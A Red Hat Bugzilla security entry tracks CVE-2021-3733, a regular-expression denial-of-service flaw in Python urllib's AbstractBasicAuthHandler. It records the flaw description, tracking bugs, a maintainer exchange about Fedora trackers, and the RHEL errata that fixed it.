Bug 1995234 (CVE-2021-3733)

Summary: CVE-2021-3733 python: urllib: Regular expression DoS in AbstractBasicAuthHandler
Product: [Other] Security Response Reporter: Pedro Sampaio <psampaio>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact:
Severity: medium Docs Contact:
Priority: medium    
Version: unspecifiedCC: adev88, aos-bugs, bdettelb, carl, caswilli, cstratak, dmalcolm, extras-orphan, fjansen, hhorak, jeffrey.ness, jnakfour, jorton, kaycoth, manisandro, m.cyprian, mhroncok, psegedy, pviktori, python-maint, python-sig, rfreiman, rkuska, shcherbina.iryna, slavek.kabrda, tcullum, thrnciar, TicoTimo, tomckay, torsava, vmugicag, vstinner, ytale
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: python 3.6.14, python 3.7.11, python 3.8.10, python 3.9.5 Doc Type: If docs needed, set a value
Doc Text:
There's a flaw in urllib's AbstractBasicAuthHandler class. An attacker who controls a malicious HTTP server that an HTTP client (such as web browser) connects to, could trigger a Regular Expression Denial of Service (ReDOS) during an authentication request with a specially crafted payload that is sent by the server to the client. The greatest threat that this flaw poses is to application availability.
 Story Points: ---
Clone Of: Environment:
Last Closed: 2021-11-02 14:07:50 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 1996117, 1996118, 1996119, 1996120, 1996134, 1997857, 1997858, 1997860, 1997861, 1997862, 1997863, 1997864, 1997865, 2000681, 2000682, 2000683, 2000684, 2000685, 2000686, 2000687, 2000688, 2001098, 2001099, 2002980, 2064449    
Bug Blocks: 1995235    

Description Pedro Sampaio 2021-08-18 16:33:37 UTC 
The ReDoS-vulnerable regex has quadratic worst-case complexity and it allows cause a denial of service when identifying crafted invalid RFCs. This ReDoS issue is on the client side and needs remote attackers to control the HTTP server.

References:

https://bugs.python.org/issue43075
https://github.com/python/cpython/pull/24391
Comment 6 Todd Cullum 2021-08-26 23:06:49 UTC 
Flaw summary:

Class AbstractBasicAuthHandler in Python's Lib/urllib/request.py uses a regex pattern `([^ \t]+)` in handling of the HTTP Basic Access Authentication Scheme[1]. This pattern allows for a quadratic time complexity ReDoS to occur when a crafted payload is processed. This flaw is similar to BZ#1809065 but the underlying cause is different; the portion of regex that creates the flaw is different, and the triggering payload is different.


1. https://datatracker.ietf.org/doc/html/rfc2617#section-2
Comment 9 Todd Cullum 2021-09-02 17:19:54 UTC 
Created mingw-python3 tracking bugs for this issue:

Affects: fedora-all [bug 2000683]


Created python2.7 tracking bugs for this issue:

Affects: fedora-all [bug 2000681]


Created python3.5 tracking bugs for this issue:

Affects: fedora-all [bug 2000685]


Created python3.6 tracking bugs for this issue:

Affects: fedora-all [bug 2000686]


Created python3.7 tracking bugs for this issue:

Affects: fedora-all [bug 2000687]


Created python3.8 tracking bugs for this issue:

Affects: fedora-all [bug 2000684]


Created python3.9 tracking bugs for this issue:

Affects: fedora-all [bug 2000688]


Created python34 tracking bugs for this issue:

Affects: epel-7 [bug 2000682]
Comment 10 Miro HronĨok 2021-09-02 17:29:24 UTC 
Todd, what is the purpose of opening the Fedora bugzillas when we already have the fixed versions?
Comment 11 Todd Cullum 2021-09-02 18:03:42 UTC 
In reply to comment #10:
> Todd, what is the purpose of opening the Fedora bugzillas when we already
> have the fixed versions?

We usually open them mostly for tracking purposes AFAIK. Typically they are opened immediately when each flaw is filed, but in this case, they didn't get opened right away. Sorry for the delay there - had to work out a kink with the PSModules for Fedora with the Incoming team.
Comment 12 Petr Viktorin (pviktori) 2021-09-03 08:06:15 UTC 
> We usually open them mostly for tracking purposes AFAIK.

Do you know who requires this tracking, and why?
If they're really necessary, can you close them after opening?
Comment 16 errata-xmlrpc 2021-11-02 08:43:25 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2021:4057 https://access.redhat.com/errata/RHSA-2021:4057
Comment 17 Product Security DevOps Team 2021-11-02 14:07:50 UTC 
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2021-3733
Comment 18 errata-xmlrpc 2021-11-09 17:27:25 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2021:4160 https://access.redhat.com/errata/RHSA-2021:4160
Comment 19 errata-xmlrpc 2022-05-02 08:05:09 UTC 
This issue has been addressed in the following products:

  Red Hat Software Collections for Red Hat Enterprise Linux 7

Via RHSA-2022:1663 https://access.redhat.com/errata/RHSA-2022:1663
Comment 20 errata-xmlrpc 2022-05-10 13:18:25 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2022:1764 https://access.redhat.com/errata/RHSA-2022:1764
Comment 21 errata-xmlrpc 2022-05-10 13:39:22 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2022:1821 https://access.redhat.com/errata/RHSA-2022:1821